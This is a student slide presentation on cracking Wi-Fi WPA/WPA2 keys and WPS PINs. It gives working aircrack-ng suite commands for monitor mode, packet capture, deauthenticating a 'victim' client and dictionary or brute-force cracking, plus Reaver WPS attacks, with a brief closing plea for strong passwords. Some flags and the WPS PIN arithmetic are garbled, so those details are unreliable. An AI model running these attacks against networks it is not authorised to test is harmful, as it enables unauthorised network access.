This document discusses WPA exploitation in wireless networks. It begins by explaining basic wireless networking concepts like WiFi, MAC addresses, and SSIDs. It then describes how wireless networks are vulnerable due to weak encryption methods like WEP. The document outlines stronger encryption methods like WPA and WPA2, but notes they can still be cracked with tools if a weak password is used. It proceeds to explain how tools like Aircrack-ng, Reaver, and John the Ripper can be used to crack wireless network encryption keys through techniques like packet sniffing, dictionary attacks, and exploiting WPS pins. In the end, it emphasizes the importance of using long, complex passwords to keep wireless networks secure.

1. WPA EXPLOITATION IN
THE WORLD OF WIRELESS
NETWORK
By Hariraj Rathod
8th sem
Department of Electronics and
Communication

2. WIFI – WIRELESS FIDELITY
 Wi-Fi, is a popular technology that allows an
electronic device to exchange data or
connect to the internet wirelessly using
radio waves.
 Wireless access allows users to connect to
the internet from any location within range
of a wireless access point.

3. SOME BASIC TERMS
 MAC address or physical address is a unique
identifier assigned to network interfaces for
communications
 Access point >> Wireless router
 SSID (service set identifier) >> Network Name
 BSSID (basic service set identification ) >>
MAC address of the access point

4. BASIC WORKING
 When a user uses wireless internet they generate
what are called data “packets”.
 Packets are transmitted between the wireless card
and the wireless access point via radio waves
whenever the computer is connected with the
access point.

5. BASIC WORKING CONTD.
 Depending on how long the computer is connected,
it can generate a certain number of packets per
day.
 The more users that are connected to one access
point, the more packets are generated.

6. WIRELESS USES RADIO FREQUENCY
 2.4 Ghz wifi spectrum

7. WIRELESS ENCRYPTION
 The main source of vulnerability associated
with wireless networks are the methods of
encryption. Different type of wireless
encryption are as follows:
 WEP
 WPA
 WPA2

8. WEP
 Stands for Wired Equivalent Privacy.
 WEP is recognizable by the key of 10 or
26 hexadecimal digits.
 WEP protocol was not developed by researchers or
experts in security and cryptography.
 Initial bytes of the key stream depended on just a
few bits of the encryption key.

9. WEP CONTINUED
 WEP Encryption Process
ICV:-32 bit integrity check value (ICV)
IV:- Initialization Vector

10. WEP CONTINUED
 WEP Decryption Process
With multiple wireless clients sending a large amount of data, an attacker
can remotely capture large amounts of WEP ciphertext and use
cryptanalysis methods to determine the WEP key.

11. WPA OR WPA2
 Stands for Wi-Fi Protected Access
 Created to provide stronger security
 Still able to be cracked if a short password is used.
 If a long passphrase or password is used, these protocol are
virtually not crackable.
 WPA-PSK and TKIP(Temporal Key Integrity Protocol ) or AES(Advance
Encryption Standard) use a Pre-Shared Key (PSK) that is more than 7
and less than 64 characters in length.
 WPS (WiFi protected Feature) simple plug and play feature.

12. USING BACKTRACK >>
 Some Basic Backtrack Terms >>
 Wlan1 – wireless interface
 Mon0 – monitor mode
 Handshake –
 refers to the negotiation process between the computer
and a WiFi server using WPA encryption.
 Needed to crack WPA/WPA2.
 Dictionary - consisting the list of common
passwords.
 .cap file – used to store packets.

13. MONITOR MODE
 Monitor mode, or RFMON (Radio Frequency
MONitor) mode, allows a computer with a wireless
network interface controller (WNIC) to monitor all
traffic received from the wireless network.
 Monitor mode allows packets to be captured
without having to associate with an access point
first.

14. TOOLS USED
 Airmon-ng >> Placing different cards in monitor mode
 Airodump-ng (Packet sniffer ) >> Tool used to listen to
wireless routers in the area.
 Aireplay-ng ( Packet injector ) >> Aireplay-ng is used to
inject frames.
 The primary function is to generate traffic for the later use
in aircrack-ng for cracking the WEP and WPA-PSK keys.
 Aircrack-ng >> Cracks WEP and WPA (Dictionary
attack) keys.

15. TOOLS USED….CONTINUED
 Word Field (Brute Force)
 Reaver Tool. (Brute Force)

16. AIRCRACK-NG
 Selecting the Interface to put it in monitor mode.
 Command used airmon-ng start wlan1

17. AIRCRACK-NG CONTINUED
 Start Capturing Packets.
 Airodump-ng mon0
 Airodump-ng mon0 –channel 1 –bssid “mac id”
–w reddot

18. AIRCRACK-NG CONTINUED
 Deauthenticate the device connected to access
point and force them to re exchange WPA key.
 Aireplay-ng -o 4 -a F4:EC:38:BA:6C:44 –c
90:4C:E5:B2:6F:D8 mon0 where "-0 4" tells
aireplay to inject deauthentication packets (4 of
them), "-a" is the wireless access point MAC
address and "-c" is the client (victim) MAC address.

19. AIRCRACK-NG CONTINUED
 Authentication process in WPA

20. AIRCRACK-NG CONTINUED
 4-way handshake os captured.

21. AIRCRACK-NG CONTINUED
 Cracking the WPA key using aircrack-ng, dictionary
file and 4-way handshake captured file redot.cap
aircrack-ng -w
/home/pranav/download/password.lst–b
F4:EC:38:BA:6C:44 /home/pranav/reddot-01.cap
where "-w" specifies the dictionary file to use.

22. JOHN THE RIPPER
 Faster then the previously used tool.
 /pentest/password/john-1.7.6.jumbo12/run/john -
stdout -incremantal all aircrack-ng –b
00:17:9A:82:44:1B -w -/home/pranav/test-01.cap

23. WORD FIELD
 Word Field is a brute force attack.
 Command line used wordfield [OPTION...]
MINLENGTH [MAXLENGTH]
 Wordfield -a -n 8 8" will output all possible
alphanumeric strings which are 8 characters long.
 wordfield -a -n 8 8 | aircrack-ng –b
00:17:9A:82:44:1B -w - /home/pranav/Wifire-
02.cap
 This attack is really effective on weak keys.

24. WORD FIELD CONTINUED
 The below took 22 hrs 7 minutes and 35 seconds

25. DICTIONARY AND BRUTE FORCE LIMITATIONS
 Passphrase cant be necessarily be found in
Dictionary list hence it has its limitations.
 Brute force technics require lot of fast hardware
computational power.
Source: http://lastbit.com/pswcalc.asp

26. REAVER TOOL.
 Reaver is fantastic tool to crack WPS pin written by
Craig Heffner.
 This tool exploits the wps 8 digit pin.
 1 bit is a checksum bit.
 7 unknown numbers, meaning there are a possible
10^7 (10,000,000) combinations which will take
approximately 116 days to break at 1 attempt every
second.

27. REAVER TOOL CONTINUED
 WPS pin 65020920

28. REAVER TOOL CONTINUED
 Finding WPS victim
 wash –I mon0

29. REAVER TOOL CONTINUED
CRACKING TECHNIQUE
 WPS pin 6502-0920
 10^4 (10,000) combinations.
 But since 1st bit is checksum bit hence the
combinations reduce to 10^3(1000)
 This reduces the time required to break the PIN to
just over 3 hours - Again, assuming that 1 attempt
is made every second.

30. REAVER TOOL CONTINUED
 reaver -i mon0 –b F4:EC:38:BA:6C:44

31. REAVER TOOL CONTINUED

32. BESECURED

33. REFERENCES
 Wi-Fi security – WEP, WPA and WPA2 Guillaume
Lehembre
 http://en.wikipedia.org/wiki/Wi-
Fi_Protected_Access#WPS_PIN_recovery
 https://sites.google.com/site/clickdeathsquad/Home/cds
-wpacrack
 http://samiux.blogspot.in/2010/04/howto-
crackwpawpa2-psk-with-john.html
 http://www.zer0trusion.com/2011/09/crackingwpa-
without-dictionary.html
 Tactical Network Solutions
 WiFi Security Megaprimer by Vivek Ramchandran

34. THANKS : )